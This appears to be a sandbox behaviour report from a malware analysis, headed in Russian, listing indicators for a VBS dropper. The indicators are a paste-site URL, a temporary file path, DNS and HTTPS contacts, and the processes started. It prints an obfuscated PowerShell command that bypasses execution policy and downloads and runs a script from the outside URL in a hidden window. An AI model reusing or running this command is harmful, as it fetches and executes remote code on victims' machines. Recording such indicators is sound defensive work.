Техническая информация
- https://throwbin.in/tz4a1j
- %TEMP%\a582.tmp\code.vbs
- %TEMP%\a582.tmp\code.vbs
- 'th##wbin.in':443
- 'th##wbin.in':443
- DNS ASK th##wbin.in
- '<SYSTEM32>\cscript.exe' %TEMP%\A582.tmp\Code.vbs
- '<SYSTEM32>\cmd.exe' /C POWERSHELL.EXE -^e^x^e^c^ ^B^y^p^a^s^s^ -^C^ ^I^E^X^(^N^e^w^-O^b^j^ec^t ^N^et.W^eb^cl^ie^nt^).D^o^wn^l^oa^dS^t^ri^n^g(^'https://throwbin.in/tz4a1j'^)' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C POWERSHELL.EXE -^e^x^e^c^ ^B^y^p^a^s^s^ -^C^ ^I^E^X^(^N^e^w^-O^b^j^ec^t ^N^et.W^eb^cl^ie^nt^).D^o^wn^l^oa^dS^t^ri^n^g(^'https://throwbin.in/tz4a1j'^)